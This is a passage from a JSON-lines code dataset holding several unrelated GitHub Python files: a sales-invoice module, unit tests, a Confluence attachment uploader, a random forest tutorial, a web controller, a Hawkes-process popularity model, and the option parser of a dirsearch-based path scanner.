If confirmed, the sale is stored in the\r\n #ventas list, the general data are shown and the invoice is printed\r\n #If it is not confirmed the process simply stops there, storing nothing and\r\n #printing a cancellation message\r\n\r\n print(\"Confirma la venta?\")\r\n confirmar = input(\"Si (1) No(2): \")\r\n while confirmar not in (\"1\", \"2\"):\r\n confirmar = input(\"Introduzca '1' para confirmar o '2' para cancelar: \")\r\n \r\n if confirmar == \"1\": \r\n print(\"Compra realizada con exito\")\r\n self.ventas.append(self)\r\n print(\"Su factura\")\r\n self.Factura()\r\n\r\n else: \r\n print(\"Venta cancelada.\")\r\n \r\n \r\n\r\n #Method that prints the attributes of the sale\r\n\r\n def Factura(self):\r\n print(f'''\r\n cliente: {self.cliente.nombre}\r\n productos: {self.CompraProductos}\r\n cantidad: {self.cantidad}\r\n total: {self.total}\r\n direccion: {self.cliente.direccion}\r\n fecha: {self.fecha} \r\n ''')\r\n\r\n #Search methods like the ones in GestiondeProductos (see those docstrings for details)\r\n\r\n def SearchClientesVentas(self):\r\n buscar= False\r\n nombre=input(\"Nombre del cliente: \\n\")\r\n for x in self.ventas:\r\n if x.cliente.nombre==nombre:\r\n buscar=True\r\n print(\"Se encuentra en la lista\")\r\n x.Factura()\r\n if not buscar:\r\n print(\"El cliente no está registrado\")\r\n\r\n def SearchFechaVentas(self):\r\n buscar = False\r\n fecha_buscar = input(\"Introduzca la fecha a buscar (mm/dd/aaaa, hh:mm:ss): \") \r\n for venta in self.ventas:\r\n if venta.fecha == fecha_buscar:\r\n buscar = True\r\n print(\"Se ha encontrado una coincidencia\")\r\n venta.Factura() \r\n if not buscar:\r\n print(\"No se han encontrado coincidencias\")\r\n\r\n def SearchMontoVentas(self):\r\n buscar=False\r\n MontoABuscar=float(input(\"Introduzca el monto a buscar: \"))\r\n for i in self.ventas:\r\n if i.total==MontoABuscar:\r\n buscar=True\r\n print(\"Existen coincidencias\")\r\n i.Factura()\r\n if not buscar:\r\n print(\"No hay compras con ese monto\")\r\n","repo_name":"Msuso23/Proyecto","sub_path":"GestiondeVentas.py","file_name":"GestiondeVentas.py","file_ext":"py","file_size_in_byte":7785,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"24493788872","text":"\ndef __set__(setting):\n local_settings = 'travtogether_server.settings.local'\n production_settings = 'backend.settings.production'\n local_host = \"127.0.0.1\"\n production_host = \"travtogether-server.herokuapp.com\"\n if setting == \"local\":\n return local_settings, local_host\n elif setting == \"production\":\n return production_settings, production_host\n\n\nCURRENT_SETTING, CURRENT_HOST = __set__(\"local\")","repo_name":"yousebastian1618/TravTogether_Server","sub_path":"travtogether_server/current_settings.py","file_name":"current_settings.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"17364621831","text":"from unittest import TestCase, mock\nimport restaurantcli as rcli\nimport restaurantratings as rr\n\n\nclass CLITestCase(TestCase):\n \"\"\"Tests for our Restaurant CLI\"\"\"\n\n def setUp(self):\n self.ratings = rr.RestaurantRatings([\n rr.RestaurantRating(\"The Tavern\", 10),\n rr.RestaurantRating(\"Gastropub\", 7)\n ])\n\n def test_get_ratings(self):\n # Create mock method that returns ratings attr\n\n def mock_get_ratings_from_file(filename):\n 
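# The filename is ignored on purpose: the canned ratings built in setUp\n # stand in for whatever the real loader would read from disk.\n 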
return self.ratings\n\n with mock.patch(\n \"restaurantratings.RestaurantRatings.get_ratings_from_file\",\n mock_get_ratings_from_file) as m:\n\n ratings = rr.RestaurantRatings.get_ratings_from_file(\"mockfile\")\n\n self.assertEqual(len(ratings.ratings), 2)\n self.assertEqual(ratings.ratings[0].name, \"The Tavern\")\n self.assertEqual(ratings.ratings[0].rating, 10)\n self.assertEqual(ratings.ratings[1].name, \"Gastropub\")\n self.assertEqual(ratings.ratings[1].rating, 7)\n\n\nclass RestaurantRatingTests(TestCase):\n \"\"\"Tests for individual restaurant rating objects\"\"\"\n\n def test_init(self):\n rating = rr.RestaurantRating(\"The Tavern\", 10)\n self.assertEqual(rating.name, \"The Tavern\")\n self.assertEqual(rating.rating, 10)\n\n def test_update_rating(self):\n rating = rr.RestaurantRating(\"The Tavern\", 10)\n rating.update_rating(2)\n self.assertEqual(rating.rating, 2)\n\n def test_eq_true(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 10)\n self.assertEqual(rating_1, rating_2)\n\n def test_eq_false(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 9)\n self.assertNotEqual(rating_1, rating_2)\n\n def test_lt_true(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 9)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 10)\n self.assertLess(rating_1, rating_2)\n\n def test_lt_false(self):\n rating_1 = rr.RestaurantRating(\"The Tavern\", 10)\n rating_2 = rr.RestaurantRating(\"Gastropub\", 9)\n self.assertFalse(rating_1 < rating_2)\n\n\nclass RestaurantRatingsTests(TestCase):\n \"\"\"Tests for the RestaurantRatingsTests umbrella objects\"\"\"\n\n def setUp(self):\n \"\"\"Set up sub-objects for RestaurantRatings tests\"\"\"\n self.rrobj = rr.RestaurantRatings([\n rr.RestaurantRating(\"The Tavern\", 10),\n rr.RestaurantRating(\"Gastropub\", 9),\n rr.RestaurantRating(\"Snack Shack\", 5)\n ])\n\n def test_init(self):\n rrobj = rr.RestaurantRatings()\n self.assertEqual(len(rrobj.ratings), 0)\n self.assertEqual(rrobj.ratings, [])\n\n def test_init_with_source(self):\n rrobj = rr.RestaurantRatings([rr.RestaurantRating(\"The Tavern\", 10)])\n self.assertEqual(len(rrobj.ratings), 1)\n self.assertEqual(rrobj.ratings[0].name, \"The Tavern\")\n self.assertEqual(rrobj.ratings[0].rating, 10)\n\n def test_add_rating(self):\n self.rrobj.add_rating(\"Kimberly's\", 5)\n self.assertEqual(len(self.rrobj.ratings), 4)\n self.assertEqual(self.rrobj.ratings[3].name, \"Kimberly's\")\n self.assertEqual(self.rrobj.ratings[3].rating, 5)\n\n def test_get_rating_by_name(self):\n restaurant_rating = self.rrobj.get_rating_by_name(\"The Tavern\")\n self.assertEqual(restaurant_rating.name, \"The Tavern\")\n self.assertEqual(restaurant_rating.rating, 10)\n\n def test_remove_rating_by_name(self):\n self.rrobj.remove_rating_by_name(\"The Tavern\")\n self.assertEqual(len(self.rrobj.ratings), 2)\n self.assertEqual(self.rrobj.ratings[0].name, \"Gastropub\")\n self.assertEqual(self.rrobj.ratings[1].name, \"Snack Shack\")\n\n def test_remove_rating_by_index(self):\n self.rrobj.remove_rating_by_index(1)\n self.assertEqual(len(self.rrobj.ratings), 2)\n self.assertEqual(self.rrobj.ratings[1].name, \"Snack Shack\")\n self.assertEqual(self.rrobj.ratings[1].rating, 5)\n\n def test_get_rating_by_name_error(self):\n # NoSuchRestaurantError is assumed to live in the restaurantratings module\n with self.assertRaises(rr.NoSuchRestaurantError):\n self.rrobj.get_rating_by_name(\"Not a Restaurant\")\n\n\nclass MockedFileRestaurantRatingsTests(TestCase):\n \"\"\"Mock our save to file test case\"\"\"\n\n 
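# mock_open() records writes made through the patched built-in open,\n # so the assertions below can inspect them without touching the disk.\n 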
def test_save_to_file(self):\n        mockobj = mock.mock_open()\n        rrobj = rr.RestaurantRatings([\n            rr.RestaurantRating(\"The Tavern\", 10)\n        ])\n\n        with mock.patch(\"builtins.open\", mockobj) as mock_f:\n            rrobj.save_to_file(\"mockfile\")\n\n        mockobj.assert_called_once_with(\"mockfile\", \"w\")\n        mockobj().write.assert_has_calls([\n            mock.call(\"The Tavern\"),\n            mock.call(\":\"),\n            mock.call(\"10\"),\n        ])\n\n\nif __name__ == \"__main__\":\n\n    import unittest\n\n    unittest.main()\n","repo_name":"nykimberly/playground-python","sub_path":"hb/w2/d6_weekend-review/restaurant-cli/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"14781968895","text":"#Adding attachments to Confluence, as well as updating metadata\r\n\r\n# -*- coding: utf-8 -*-\r\nfrom __future__ import with_statement\r\nimport sys, string, re, os\r\nimport pyodbc\r\nimport xmlrpc.client\r\nimport codecs\r\n\r\nURL ='' \r\nusername = '' #login\r\npwd = '' #password\r\nclient = xmlrpc.client.ServerProxy(URL+'/rpc/xmlrpc') #API.XMLRPC\r\nauthToken = client.confluence2.login(username,pwd) #API.authorization\r\n\r\nPAGE_PRN_ID = '885102819'\r\n\r\nsql_5_0 = \"SELECT FILE_PATH,PAGE_PRN_ID, FILE_EXT,FULL_NAME FROM DEV_DB_STG.S_FILE_POWER_DESIGNER where FILE_EXT in ('png','gif','css','js') order by FILE_NAME, FILE_EXT\"\r\nprint(sql_5_0)\r\nconnect = pyodbc.connect('DSN=TD')\r\ncursor = connect.cursor()\r\ncursor.execute(sql_5_0)\r\nconnect.commit()\r\ntable_5 = cursor.fetchall()\r\nfor row in table_5:\r\n    print(row[0],row[2])\r\n    if row[2] == 'gif':\r\n        contentType = 'image/gif'\r\n    elif row[2] == 'png':\r\n        contentType = 'image/png'\r\n    elif row[2] == 'css':\r\n        contentType = 'text/css'\r\n    elif row[2] == 'js':\r\n        contentType = 'application/x-javascript'\r\n    path = row[0]\r\n    f = open(path,'rb')\r\n    data = f.read()\r\n    filename = row[3]\r\n    page_id = row[1]\r\n    page = client.confluence2.getPage(authToken, str(page_id))\r\n    client.confluence2.removeAttachment(authToken, str(page_id),str(filename))\r\n    print('file removed')\r\n    if page is None:\r\n        exit(\"Could not find page \" + str(page_id))\r\n    attachment = {}\r\n    attachment['fileName'] =os.path.basename(filename)\r\n    attachment['contentType'] = contentType\r\n    print(page['id'])\r\n    client.confluence2.addAttachment(authToken, page['id'], attachment, xmlrpc.client.Binary(data))\r\nf.close()\r\ncursor.close()\r\nconnect.close()\r\n#-----------------------------------------------------------------------------------------------------\r\npage_attachment = '885102819'\r\ntext = client.confluence2.getAttachments(authToken,page_attachment)\r\nconnect = pyodbc.connect('DSN=TD')\r\ncursor = connect.cursor()\r\nfor i in range(len(text)):\r\n    sql_6_1 = \"UPDATE DEV_DB_STG.S_FILE_POWER_DESIGNER set URL ='\"+str(text[i]['url']) + u\"' where FULL_NAME = '\" + str(text[i]['fileName'])+u\"';\"\r\n    cursor.execute(sql_6_1)\r\n    connect.commit()\r\ncursor.close()\r\nconnect.close()\r\n","repo_name":"Testudinate/Confluence","sub_path":"05_addAttachment_getAttachments.py","file_name":"05_addAttachment_getAttachments.py","file_ext":"py","file_size_in_byte":2269,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"17239598628","text":"# Combining weak to strong learners via random forests\n'''\nIntuitively, a random forest can be considered as an ensemble of decision\ntrees. The idea behind ensemble learning is to combine weak learners\nto build a more robust model, a strong learner, that has a better generalization\nerror and is less susceptible to overfitting.\n\n'''\n
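# (scikit-learn's RandomForestClassifier, used below, implements this ensemble-of-trees idea)\n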
# Train a model to classify the different flowers in our Iris dataset\nfrom sklearn import datasets\nimport numpy as np\n\niris = datasets.load_iris()\nX = iris.data[:, [2, 3]]\ny = iris.target\n\nfrom sklearn.cross_validation import train_test_split\n\n# random_state : int or RandomState\n# Pseudo-random number generator state used for random sampling.\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=0)\n# stack train and test samples so the decision regions can be drawn over the full dataset\nX_combined = np.vstack((X_train, X_test))\ny_combined = np.hstack((y_train, y_test))\n\nfrom matplotlib.colors import ListedColormap\nimport matplotlib.pyplot as plt\n\n\ndef plot_decision_regions(X, y, classifier, test_idx=None, resolution=0.02):\n    # setup marker generator and color map\n    markers = ('s', 'x', 'o', '^', 'v')\n    colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\n    cmap = ListedColormap(colors[:len(np.unique(y))])\n    # plot the decision surface\n    x1_min, x1_max = X[:, 0].min() - 1, X[:, 0].max() + 1\n    x2_min, x2_max = X[:, 1].min() - 1, X[:, 1].max() + 1\n    xx1, xx2 = np.meshgrid(np.arange(x1_min, x1_max, resolution),\n                           np.arange(x2_min, x2_max, resolution))\n    Z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\n    Z = Z.reshape(xx1.shape)\n    plt.contourf(xx1, xx2, Z, alpha=0.4, cmap=cmap)\n    plt.xlim(xx1.min(), xx1.max())\n    plt.ylim(xx2.min(), xx2.max())\n    # plot all samples\n    for idx, cl in enumerate(np.unique(y)):\n        plt.scatter(x=X[y == cl, 0], y=X[y == cl, 1], alpha=0.8, c=cmap(idx), marker=markers[idx], label=cl)\n\n    # highlight test samples\n    if test_idx:\n        X_test, y_test = X[test_idx, :], y[test_idx]\n        plt.scatter(X_test[:, 0], X_test[:, 1], c='', alpha=1.0, linewidth=1, marker='o', s=55, label='test set')\n\n\n'''\nWe do not have to construct the random forest classifier from individual decision trees\nby ourselves; there is already an implementation in scikit-learn that we can use:\n''' \nfrom sklearn.ensemble import RandomForestClassifier\nforest = RandomForestClassifier(criterion='entropy', n_estimators=10, random_state=1, n_jobs=2)\nforest.fit(X_train, y_train)\nplot_decision_regions(X_combined, y_combined, classifier=forest, test_idx=range(105, 150))\nplt.xlabel('petal length')\nplt.ylabel('petal width')\nplt.legend(loc='upper left')\nplt.show()\n\n'''\nUsing the preceding code, we trained a random forest from 10 decision trees via the\nn_estimators parameter and used the entropy criterion as an impurity measure to\nsplit the nodes. Although we are growing a very small random forest from a very\nsmall training dataset, we used the n_jobs parameter for demonstration purposes,\nwhich allows us to parallelize the model training using multiple cores of our\ncomputer (here, two).\n\n'''\n","repo_name":"wei-Z/Python-Machine-Learning","sub_path":"self_practice/Chapter 3 Random Forest.py","file_name":"Chapter 3 Random Forest.py","file_ext":"py","file_size_in_byte":3125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"24760604673","text":"#1. A single line of text is given. For every word in this text, count how many\r\n# times it occurs in the text. The task must be solved using a dictionary.\r\n
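# (equivalent sketch: collections.Counter(s) would build the same word counts in one call)\r\n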
\r\ns = input('Enter the string: ')\r\ns = s.split()\r\nd = dict()\r\nfor k in s:\r\n    if k in d:\r\n        d[k] += 1\r\n    else:\r\n        d[k] = 1\r\nfor k in d:\r\n    print(k,':', d[k])","repo_name":"podloznyi/Studying_Python","sub_path":"HomeWork7/ThirdTask.py","file_name":"ThirdTask.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
+{"seq_id":"28018261845","text":"from datetime import datetime\nimport logging\n\nfrom paste.deploy.converters import asbool, asint\nfrom pylons import request, response, tmpl_context as c, config\nfrom pylons.controllers.util import redirect\nfrom pylons.decorators import validate\nfrom sqlalchemy import not_\n\nfrom adhocracy import model\nfrom adhocracy.controllers.event import EventController\nfrom adhocracy.lib import helpers as h\nfrom adhocracy.lib import pager, sorting\nfrom adhocracy.lib.auth import require\nfrom adhocracy.lib.base import BaseController\nfrom adhocracy.lib.staticpage import get_static_page\nfrom adhocracy.lib.templating import render\nfrom adhocracy.lib.util import get_entity_or_abort\n\nfrom proposal import ProposalFilterForm\n\n\nlog = logging.getLogger(__name__)\n\n\nclass RootController(BaseController):\n\n    @validate(schema=ProposalFilterForm(), post_only=False, on_get=True)\n    def index(self, format='html'):\n        require.proposal.index()\n        if c.instance:\n            redirect(h.entity_url(c.instance))\n\n        instances_in_root = asint(\n            config.get('adhocracy.startpage.instances.list_length', 0))\n        if instances_in_root > 0:\n            c.instances = model.Instance.all(limit=instances_in_root)\n        elif instances_in_root == -1:\n            c.instances = model.Instance.all()\n\n        c.page = get_static_page('index')\n\n        proposals_number = asint(\n            config.get('adhocracy.startpage.proposals.list_length', 0))\n\n        if proposals_number > 0:\n            proposals = model.Proposal.all_q()\\\n                .join(model.Instance).filter(not_(\n                    model.Instance.key.in_(model.Instance.SPECIAL_KEYS)))\\\n                .order_by(model.Proposal.create_time.desc())\n\n            c.new_proposals_pager = pager.proposals(\n                proposals, size=proposals_number,\n                default_sort=sorting.entity_newest,\n                enable_pages=False,\n                enable_sorts=False)\n        else:\n            c.new_proposals_pager = None\n\n        if asbool(config.get('adhocracy.show_stats_on_frontpage', 'true')):\n            c.stats_global = {\n                \"members\": model.User.all_q().count(),\n                \"comments\": model.Comment.all_q().count(),\n                \"proposals\": model.Proposal.all_q().count(),\n                \"votes\": model.Vote.all_q().count(),\n            }\n\n        if format == 'rss':\n            return EventController().all(format='rss')\n\n        return render('index.html')\n\n    #@RequireInstance\n    def dispatch_delegateable(self, id):\n        dgb = get_entity_or_abort(model.Delegateable, id,\n                                  instance_filter=False)\n        redirect(h.entity_url(dgb))\n\n    def sitemap_xml(self):\n        if c.instance:\n            redirect(h.base_url('/sitemap.xml', None))\n        c.delegateables = model.Delegateable.all()\n        c.change_time = datetime.utcnow()\n        response.content_type = \"text/xml\"\n        return render(\"sitemap.xml\")\n\n    def robots_txt(self):\n        response.content_type = \"text/plain\"\n        if not c.instance:\n            return render(\"robots.txt\")\n        return render(\"instance/robots.txt\")\n\n    def tutorials(self):\n        if 'disable' in request.params:\n            name = request.params.get('disable')\n            if name == 'ALL':\n                h.tutorial.disable(None)\n            else:\n                h.tutorial.disable(name)\n        else:\n            
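# no 'disable' parameter in the request: turn the tutorial hints back on\n            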
h.tutorial.enable()\n","repo_name":"whausen/part","sub_path":"src/adhocracy/controllers/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":3439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"25090492824","text":"from __future__ import print_function, division\nimport sys\nimport os\nimport bz2\nimport json\nimport cPickle as pickle\nimport numpy as np\nfrom scipy import optimize\nimport matplotlib.pyplot as plt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n# Hawkes Intensity Process model in Python\n\n\ndef get_C(k, alpha=2.016, beta=0.1):\n \"\"\"\n Get parameter capital C.\n :param k: scaling factor for video quality\n :param alpha: power-law exponent of user influence distribution\n :param beta: user influence component\n :return: parameter capital C\n \"\"\"\n return k*(alpha-1)/(alpha-beta-1)\n\n\ndef rand_initialize_weights(n):\n \"\"\"\n Initialize multiple sets of random weights for theta.\n :param n: number of sets of random weights\n :return: n sets of random vectors, in the order of mu, theta, C, c, gamma, eta\n \"\"\"\n ret = []\n for _ in xrange(n):\n rand_mu = np.random.uniform(0, 505.90)\n rand_theta = np.random.uniform(2.3, 67.7)\n rand_C = get_C(np.random.uniform(0, 52.9))\n rand_c = np.random.uniform(0, 4)\n rand_gamma = np.random.uniform(0, 9947)\n rand_eta = np.random.uniform(0, 289.2)\n ret.append(np.array([rand_mu, rand_theta, rand_C, rand_c, rand_gamma, rand_eta]))\n return ret\n\n\ndef time_decay(i, c):\n \"\"\"\n Time decay part for series (tau + c).\n :param i: tau value\n :param c: c value\n :return: abbreviated presentation\n \"\"\"\n return np.arange(1, i+1)[::-1]+c\n\n\ndef predict(params, x):\n \"\"\"\n Predict viewcount with sharecount sequence x.\n Comments are for vector operation style\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount sequence from beginning\n :return: predict value\n \"\"\"\n mu, theta, C, c, gamma, eta = params\n n = len(x)\n x_predict = np.zeros(len(x))\n for i in xrange(n):\n if i == 0:\n x_predict[0] = gamma + mu*x[0]\n else:\n x_predict[i] = eta + mu*x[i] + C*np.sum(x_predict[:i]*(time_decay(i, c)**(-1-theta)))\n return x_predict\n\n\ndef cost_function(params, x, y, num_split=None):\n \"\"\"\n Non-regularized cost function for HIP model\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :param num_split: number of test set\n :return: cost function value\n \"\"\"\n view_predict = predict(params, x)\n cost_vector = view_predict - y\n if num_split is not None:\n cost_vector = cost_vector[-num_split:]\n cost = np.sum(cost_vector ** 2) / 2\n return cost/len(cost_vector)\n\n\ndef grad_descent(params, x, y):\n \"\"\"\n Non-regularized gradient function for HIP model\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :return: cost function value\n \"\"\"\n mu, theta, C, c, gamma, eta = params\n view_predict = predict(params, x)\n n = len(x)\n # partial derivative for mu\n grad_mu_vector = np.zeros(n)\n grad_mu_vector[0] = x[0]\n for i in xrange(1, n):\n grad_mu_vector[i] = x[i] + C*np.sum(grad_mu_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_mu = np.sum((view_predict-y)*grad_mu_vector)\n # partial derivative for theta\n grad_theta_vector = np.zeros(n)\n grad_theta_vector[0] = 0\n for i in xrange(1, n):\n grad_theta_vector[i] = 
C*np.sum((grad_theta_vector[:i]-view_predict[:i]*np.log(time_decay(i, c))) * (time_decay(i, c)**(-1-theta)))\n grad_theta = np.sum((view_predict-y)*grad_theta_vector)\n # partial derivative for C\n grad_C_vector = np.zeros(n)\n grad_C_vector[0] = 0\n for i in xrange(1, n):\n grad_C_vector[i] = np.sum((C*grad_C_vector[:i]+view_predict[:i]) * (time_decay(i, c)**(-1-theta)))\n grad_C = np.sum((view_predict-y)*grad_C_vector)\n # partial derivative for c\n grad_c_vector = np.zeros(n)\n grad_c_vector[0] = 0\n for i in xrange(1, n):\n grad_c_vector[i] = C*np.sum((grad_c_vector[:i]-(1+theta)*view_predict[:i]/time_decay(i, c)) * (time_decay(i, c)**(-1-theta)))\n grad_c = np.sum((view_predict-y)*grad_c_vector)\n # partial derivative for gamma\n grad_gamma_vector = np.zeros(n)\n grad_gamma_vector[0] = 1\n for i in xrange(1, n):\n grad_gamma_vector[i] = C*np.sum(grad_gamma_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_gamma = np.sum((view_predict-y)*grad_gamma_vector)\n # partial derivative for eta\n grad_eta_vector = np.zeros(n)\n grad_eta_vector[0] = 0\n for i in xrange(1, n):\n grad_eta_vector[i] = 1 + C*np.sum(grad_eta_vector[:i] * (time_decay(i, c)**(-1-theta)))\n grad_eta = np.sum((view_predict-y)*grad_eta_vector)\n return np.array([grad_mu, grad_theta, grad_C, grad_c, grad_gamma, grad_eta])/n\n\n\ndef train_process(x_train, y_train, initial_weights_sets):\n \"\"\"\n Train HIP with BFGS optimization tool\n :param x_train: train sharecount\n :param y_train: train viewcount\n :param initial_weights_sets: sets of random initial weights\n :return: best optimization parameters\n \"\"\"\n best_params = None\n best_cost = np.inf\n\n for init_idx, initial_weight in enumerate(initial_weights_sets):\n # perform non-regularized optimization with l-bfgs\n optimizer = optimize.minimize(cost_function, initial_weight, jac=grad_descent, method='L-BFGS-B',\n args=(x_train, y_train), bounds=bounds)\n if optimizer.fun < best_cost:\n best_cost = optimizer.fun\n best_params = optimizer.x\n\n return best_params\n\n\ndef plot_func(params, x, y, title, idx):\n \"\"\"\n Plot trend from R-HIP, PY-HIP and AUTO-HIP parameters\n :param params: model parameters, mu, theta, C, c, gamma, eta\n :param x: observed sharecount\n :param y: observed viewcount\n :param title: figure title, YoutubeID\n :param idx: subplot index\n :return:\n \"\"\"\n # visualise sample data\n ax1 = fig.add_subplot(121+idx)\n # ax1 = fig.add_subplot(111)\n ax2 = ax1.twinx()\n ax1.plot(np.arange(1, age+1), y, 'k--', label='observed #views')\n ax2.plot(np.arange(1, age+1), x, 'r-', label='#share')\n ax1.plot((num_train, num_train), (ax1.get_ylim()[0], ax1.get_ylim()[1]), 'k--')\n\n ax1.set_ylim(ymin=max(0, ax1.get_ylim()[0]))\n ax2.set_ylim(ymax=3*max(x))\n ax1.set_xlabel('video age (day)')\n ax1.set_ylabel('Number of views', color='k')\n ax1.tick_params('y', colors='k')\n ax2.set_ylabel('Number of shares', color='r')\n ax2.tick_params('y', colors='r')\n\n mu, theta, C, c, gamma, eta = params\n ax2.text(0.03, 0.85, '$\\mu$={0:.2f}, $\\\\theta$={1:.2f}\\nC={2:.2f}, c={3:.2f}\\n$\\gamma$={4:.2f}, $\\eta$={5:.2f}'\n .format(mu, theta, C, c, gamma, eta), transform=ax1.transAxes)\n ax1.set_title(title)\n\n predidt_x = predict(params, x)\n ax1.plot(np.arange(1, num_train+1), predidt_x[:num_train], 'b-', label='HIP fit')\n ax1.plot(np.arange(num_train+1, age+1), predidt_x[num_train:age], 'm-', label='HIP forecast')\n\n\nif __name__ == '__main__':\n # == == == == == == == == Part 1: Load ACTIVE dataset == == == == == == == == #\n # First time it gets loaded 
from the JSON format and writes essential fields into a pickle binary file.\n # check if the binary exists\n if not os.path.exists('../data/active-dataset.p'):\n print('--> Converting ACTIVE dataset from JSON format to pickle... might take a while!')\n test_cases = {}\n with bz2.BZ2File('../data/active-dataset.json.bz2') as f:\n dataset = json.loads(f.readline())\n for video in dataset:\n test_cases[video['YoutubeID']] = (video['numShare'], video['dailyViewcount'])\n pickle.dump(test_cases, open('../data/active-dataset.p', 'wb'))\n\n print('--> Loading the ACTIVE dataset from pickle...')\n test_cases = pickle.load(open('../data/active-dataset.p', 'rb'))\n # select 2 videos from paper\n test_vids = ['bUORBT9iFKc', 'cG0nQTYd8ck']\n # or random select 2 videos\n # test_videos = np.array(test_cases.keys())\n # random_index = np.random.randint(0, len(test_videos), 2)\n # test_vids = test_videos[random_index]\n\n # == == == == == == == == Part 2: Set up experiment parameters == == == == == == == == #\n # setting parameters\n fig = plt.figure(figsize=(14, 5))\n age = 120\n num_train = 90\n num_test = 30\n k = 5\n bounds = [(0, None), (0, None), (0, None), (None, None), (0, None), (0, None)]\n\n for tc_idx, vid in enumerate(test_vids):\n print('fitting and forecasting for video: {0}'.format(vid))\n dailyshare, dailyview = test_cases[vid]\n dailyshare = dailyshare[:age]\n dailyview = dailyview[:age]\n\n x_train = dailyshare[: num_train]\n y_train = dailyview[: num_train]\n\n # initialize weights\n # k sets of random params\n initial_weights_sets = rand_initialize_weights(k)\n\n # == == == == == == == == Part 3: Train with closed form gradient == == == == == == == == #\n best_fitted_params = train_process(x_train, y_train, initial_weights_sets)\n\n # == == == == == == == == Part 4: Plot fitting and forecast result == == == == == == == == #\n plot_func(best_fitted_params, dailyshare, dailyview, vid, tc_idx)\n\n plt.tight_layout()\n plt.show()\n","repo_name":"zhangleihan/hip-popularity","sub_path":"pyhip/pyhip.py","file_name":"pyhip.py","file_ext":"py","file_size_in_byte":9292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"72897155113","text":"# -*- coding: utf-8 -*-\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n# \n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n# \n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,\n# MA 02110-1301, USA.\n#\n# Author: Mauro Soria\n\nfrom optparse import OptionParser, OptionGroup\n\nfrom ...lib.utils.FileUtils import File\nfrom ...lib.utils.FileUtils import FileUtils\nfrom ...lib.utils.DefaultConfigParser import DefaultConfigParser\nfrom ...thirdparty.oset import oset\n\n\nclass ArgumentParser(object):\n def __init__(self, url, wordlist=\"./black/workers/dirsearch/dirsearch_ext/db/dicc.txt\", extensions=None, http_proxy=None, headers=None, user_agent=None, \n user_random_agents=None, cookie=None, threads_count=10, exclude_status_codes=None, path=\"/\",\n force_extensions=False, delay=0, timeout=1, ip_address=None, recursive=False, redirect=False, **kwargs):\n self.script_path = None\n\n self.url = url\n if extensions is None:\n print('No extension specified. You must specify at least one extension')\n exit(0)\n with File(wordlist) as file_wordlist:\n if not file_wordlist.exists():\n print('The wordlist file does not exist')\n exit(0)\n if not file_wordlist.isValid():\n print('The wordlist is invalid')\n exit(0)\n if not file_wordlist.canRead():\n print('The wordlist cannot be read')\n exit(0)\n if http_proxy is not None:\n if http_proxy.startswith('http://'):\n self.proxy = http_proxy\n else:\n self.proxy = 'http://{0}'.format(http_proxy)\n else:\n self.proxy = None\n if headers is not None:\n try:\n self.headers = dict((key.strip(), value.strip()) for (key, value) in (header.split(':', 1)\n for header in headers))\n except Exception as _:\n print('Invalid headers')\n exit(0)\n else:\n self.headers = {}\n\n self.extensions = list(oset([extension.strip() for extension in extensions.split(',')]))\n self.user_agent = user_agent\n self.user_random_agents = user_random_agents\n self.cookie = cookie\n if threads_count < 1:\n print('Threads number must be a number greater than zero')\n exit(0)\n self.threads_count = threads_count\n if exclude_status_codes is not None:\n try:\n self.exclude_status_codes = list(\n oset([int(exclude_status_code.strip()) if exclude_status_code else None for exclude_status_code in\n exclude_status_codes.split(',')]))\n except ValueError:\n self.exclude_status_codes = []\n else:\n self.exclude_status_codes = []\n self.path = path\n self.wordlist = wordlist\n self.force_extensions = force_extensions\n\n self.delay = delay\n self.timeout = timeout\n self.ip_address = ip_address\n self.recursive = recursive\n\n # Well, here we have constants that were used in the original dirsearch,\n # BUT i am too lazy to remove them totally. 
